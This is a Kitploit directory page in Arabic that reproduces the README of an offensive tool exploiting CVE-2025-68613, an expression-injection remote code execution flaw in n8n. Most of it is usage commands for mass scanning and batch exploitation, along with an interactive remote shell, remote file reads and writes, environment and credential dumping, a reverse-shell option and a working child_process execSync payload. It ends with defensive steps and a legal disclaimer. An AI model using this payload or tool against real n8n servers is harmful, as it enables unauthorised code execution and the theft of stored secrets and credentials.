Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ تنفيذ التعليمات البرمجية عن بُعد في أتمتة سير العمل | Kitploit
أدوات/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمر
أداة الوصول عن بعد
تطوير الحمولات
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ تنفيذ التعليمات البرمجية عن بُعد في أتمتة سير العمل

عرض المستودع
532منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

n8n God Mode Ultimate - ماسح CVE-2025-68613 وإطار استغلال

n8n God Mode Ultimate

أداة متقدمة لفحص واستغلال RCE لأتمتة سير عمل n8n

Python Version License CVE CVSS Score


🎯 نظرة عامة

n8n God Mode Ultimate هو إطار شامل لاختبار الأمان مصمم لاكتشاف والتحقق من CVE-2025-68613 في منصات أتمتة سير عمل n8n. تؤثر هذه الثغرة الحرجة لتنفيذ الأكواد عن بُعد (RCE) على إصدارات n8n من خلال حقن التعبيرات في سياقات تنفيذ سير العمل.

تفاصيل CVE-2025-68613
  • درجة CVSS: 10.0 (حرجة)
  • ناقل الهجوم: الشبكة
  • تعقيد الهجوم: منخفض
  • الصلاحيات المطلوبة: منخفضة (بيانات اعتماد صالحة)
  • تفاعل المستخدم: لا شيء
  • نوع الثغرة: حقن التعبيرات ← تنفيذ الأكواد عن بُعد

الإصدارات المتأثرة:

  • n8n >= 0.211.0 و < 1.120.4
  • n8n >= 1.121.0 و < 1.121.1

الإصدارات المصلَّحة:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ الميزات

🔍 الاكتشاف والفحص

  • اكتشاف ذكي للإصدار - استخراج إصدار n8n من البيانات الوصفية لصفحة تسجيل الدخول
  • فحص جماعي - مسح متزامن متعدد الخيوط للأهداف مع تتبع التقدم
  • أوضاع فحص متعددة:
    • --detect - اكتشاف الإصدار فقط (الأسرع وغير التدخلي)
    • --safe - فحص آمن للثغرة دون استغلال
    • --poc - التحقق من إثبات المفهوم لـ RCE
    • --exploit - وضع الاستغلال الكامل

💣 قدرات الاستغلال

  • 4 تقنيات استغلال:
    1. مشغّل الجدولة - سير عمل يُنفَّذ تلقائيًا (الأكثر موثوقية)
    2. مشغّل Webhook - تنفيذ يتم تشغيله عبر HTTP
    3. عقدة الكود - وصول مباشر إلى child_process
    4. حقن التعبيرات - تنفيذ تعبيرات يدويًا

🎮 ميزات الوضع الخارق (God Mode)

  • صدفة تفاعلية - صدفة بعيدة كاملة مع سجل أوامر
  • عمليات الملفات:
    • read <file> - قراءة ملفات بعيدة
    • write <file> <content> - كتابة ملفات على الهدف
  • استخراج بيئة التشغيل - تفريغ جميع متغيرات البيئة
  • معلومات النظام - تفاصيل نظام التشغيل، إعدادات الشبكة، معلومات العمليات
  • صدفة عكسية - توليد حمولة صدفة عكسية اختيارية
  • سجل الأوامر - تتبع سجل مدمج

📊 قدرات متقدمة

  • تعداد بيانات الاعتماد - استخراج بيانات الاعتماد المخزنة عبر API
  • تفريغ سير العمل - تصدير جميع سير العمل مع البيانات الوصفية
  • استخراج الإعدادات - تفريغ كامل لإعدادات النظام
  • تعداد المستخدمين - سرد جميع مستخدمي n8n
  • تحليل سجلات التنفيذ - تحليل مخرجات الأوامر من عمليات تنفيذ سير العمل
  • تنظيف تلقائي - حذف سير العمل اختياريًا بعد التنفيذ

🚀 التثبيت

المتطلبات الأساسية

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip3 --version

تثبيت التبعيات

root@kitploit:~
# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Install required packages
pip3 install -r requirements.txt

المتطلبات

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 الاستخدام

الاستخدام الأساسي

root@kitploit:~
# Display help menu
python3 n8n-godmode-ultimate.py -h

# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

عمليات الوضع الخارق (God Mode)

root@kitploit:~
# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

الفحص الجماعي

root@kitploit:~
# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

صيغة targets.txt:

root@kitploit:~
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

أوامر الصدفة التفاعلية

عند الدخول في وضع الصدفة (--shell):

root@kitploit:~
n8n> whoami              # Execute command
n8n> read /etc/passwd    # Read file
n8n> env                 # Show environment variables
n8n> info                # System information
n8n> history             # Command history
n8n> exit                # Exit shell

🛠️ خيارات سطر الأوامر

خيارات الهدف

root@kitploit:~
-u, --url URL             Target n8n URL
-l, --list FILE           File containing target URLs
-t, --threads NUM         Number of threads for batch scanning (default: 10)

المصادقة

root@kitploit:~
-e, --email EMAIL         n8n user email
-p, --password PASS       n8n user password

أوضاع الفحص

root@kitploit:~
--detect                  Version detection only (fastest)
--safe                    Safe check without exploitation
--poc                     RCE proof-of-concept
--exploit                 Full exploitation mode

الوضع الخارق (God Mode)

root@kitploit:~
--god                     Enable god mode
--cmd COMMAND             Execute single command
--read-file PATH          Read remote file
--write-file PATH         Write remote file
--content DATA            Content for write operation
--dump-env                Extract all environment variables
--shell                   Interactive shell mode
--revshell HOST:PORT      Reverse shell payload

خيارات الاستغلال

root@kitploit:~
--mode MODE               Exploit mode: schedule|webhook|code|expression (default: schedule)
--timeout SEC             Command timeout in seconds (default: 30)
--cleanup                 Delete workflows after execution
-k, --insecure           Disable SSL verification
-v, --verbose            Verbose output
-q, --quiet              Minimal output

🔬 التفاصيل التقنية

منهجية الاستغلال

1. مشغّل الجدولة (الموصى به)

ينشئ سير عمل بمشغّل مجدول يُنفَّذ تلقائيًا كل 3 ثوانٍ. الطريقة الأكثر موثوقية.

root@kitploit:~
Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. مشغّل Webhook

ينشئ نقطة نهاية webhook عبر HTTP تنفّذ الأوامر عند تشغيلها.

3. عقدة الكود

يحقن الكود مباشرة في عقدة Code مع وصول إلى child_process.

4. حقن التعبيرات

تنفيذ يدوي عبر نظام تقييم التعبيرات في n8n.

اكتشاف الإصدار

يستخرج الإصدار من إعدادات Sentry المشفرة بـ base64 في صفحة تسجيل الدخول:

root@kitploit:~
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

نقاط نهاية API المستخدمة

  • /rest/login - المصادقة
  • /rest/workflows - عمليات CRUD لسير العمل
  • /rest/credentials - تعداد بيانات الاعتماد
  • /rest/executions - استرجاع سجلات التنفيذ
  • /rest/users - تعداد المستخدمين
  • /rest/settings - إعدادات النظام

📊 أمثلة على المخرجات

اكتشاف الإصدار

root@kitploit:~
[*] n8n God Mode Ultimate v1.0.0
[*] Target: https://target.example.com
[✓] n8n Version: 1.36.1
[!] Status: VULNERABLE (< 1.120.4)

إثبات المفهوم لـ RCE

root@kitploit:~
[*] Authentication successful
[*] Creating exploitation workflow...
[*] Workflow ID: hd6LxSY765WBThqd
[*] Executing command: whoami
[✓] Command executed successfully!
[+] Output: root

الصدفة التفاعلية

root@kitploit:~
n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] Environment Variables:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ الإجراءات الدفاعية

إجراءات فورية

  1. الترقية إلى إصدار مصلَّح (>= 1.120.4 أو >= 1.121.1)
  2. تعطيل بيانات الاعتماد الافتراضية ([email protected]:admin)
  3. تطبيق مصادقة قوية (يُوصى بـ MFA)
  4. تقسيم الشبكة - تقييد الوصول إلى مثيل n8n
  5. مراجعة سير العمل - مراجعة جميع سير العمل النشطة
  6. مراقبة سجلات التنفيذ - التحقق من وجود نشاط مشبوه

التحصين طويل الأمد

  • تفعيل تسجيل التدقيق
  • تطبيق قائمة بيضاء لعناوين IP
  • استخدام مصادقة OAuth/SSO
  • تقييمات أمنية منتظمة
  • إبقاء n8n محدثًا
  • تشفير قاعدة البيانات أثناء التخزين
  • تخزين آمن لبيانات الاعتماد
  • مراقبة حركة مرور الشبكة

⚠️ إخلاء المسؤولية القانوني

للاستخدام المصرَّح به في اختبارات الأمان فقط

هذه الأداة متوفرة لأغراض تعليمية واختبارات الأمان المصرَّح بها. يجب على المستخدمين الامتثال لجميع القوانين واللوائح المعمول بها.

⚖️ المتطلبات القانونية

يجب عليك:

  • ✅ الحصول على إذن كتابي قبل الاختبار
  • ✅ استخدامها فقط على الأنظمة التي تملكها أو لديك إذن باختبارها
  • ✅ الامتثال لممارسات الإفصاح المسؤول
  • ✅ اتباع القوانين واللوائح المعمول بها
  • ✅ استخدامها لأغراض الأمان الدفاعية

يجب عليك عدم:

  • ❌ اختبار الأنظمة دون إذن صريح
  • ❌ استخدامها لأغراض خبيثة
  • ❌ تنفيذ هجمات حجب الخدمة
  • ❌ استخراج أو تعديل البيانات دون إذن
  • ❌ نشرها على أنظمة الإنتاج دون موافقة

📜 المسؤولية

لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذه الأداة. الوصول غير المصرَّح به إلى أنظمة الكمبيوتر غير قانوني بموجب:

  • قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) - الولايات المتحدة
  • قانون إساءة استخدام الحاسوب - المملكة المتحدة
  • توجيه الجرائم الإلكترونية للاتحاد الأوروبي
  • تشريعات مماثلة في جميع أنحاء العالم

استخدمها على مسؤوليتك الخاصة. أنت مسؤول عن أفعالك.


🤝 المساهمة

المساهمات مرحب بها! يرجى اتباع هذه الإرشادات:

  1. أنشئ Fork من المستودع
  2. أنشئ فرع ميزة (git checkout -b feature/improvement)
  3. نفّذ تغييراتك (git commit -am 'Add new feature')
  4. ادفع التغييرات إلى الفرع (git push origin feature/improvement)
  5. أنشئ طلب سحب (Pull Request)

مدونة قواعد السلوك

  • اتبع ممارسات الإفصاح المسؤول
  • وثّق ميزات الأمان بوضوح
  • ضمّن معالجة أخطاء مناسبة
  • أضف تعليقات للمنطق البرمجي المعقد
  • اختبر بدقة قبل التقديم

📚 المراجع

معلومات CVE

  • CVE-2025-68613 - NVD
  • نشرات n8n الأمنية

وثائق n8n

  • الوثائق الرسمية لـ n8n
  • مرجع API لـ n8n
  • أفضل ممارسات أمان n8n

الأبحاث الأمنية

  • ثغرات حقن التعبيرات
  • أمان أتمتة سير العمل

👨‍💻 المؤلف

Satyam Rastogi

  • GitHub: @hackersatyamrastogi
  • الموقع الإلكتروني: https://www.satyamrastogi.com
  • تويتر: @hackersatyamrastogi

📄 الترخيص

هذا المشروع مرخَّص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

root@kitploit:~
MIT License

Copyright (c) 2025 Satyam Rastogi

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

🌟 الشكر والتقدير

  • فريق n8n لبناء منصة رائعة لأتمتة سير العمل
  • الباحثون الأمنيون في مجتمع n8n
  • أدوات الأمان مفتوحة المصدر التي ألهمت هذا المشروع

📞 الدعم

للقضايا الأمنية، يرجى الإبلاغ بمسؤولية:

  • القضايا الأمنية: افتح استشارة أمنية خاصة
  • تقرير الأخطاء: استخدم GitHub Issues
  • طلبات الميزات: افتح نقاشًا على GitHub

⭐ امنح هذا المستودع نجمة إذا وجدته مفيدًا!

صُنع بـ 💻 بواسطة باحثين أمنيين، للباحثين الأمنيين

تنزيل الأداة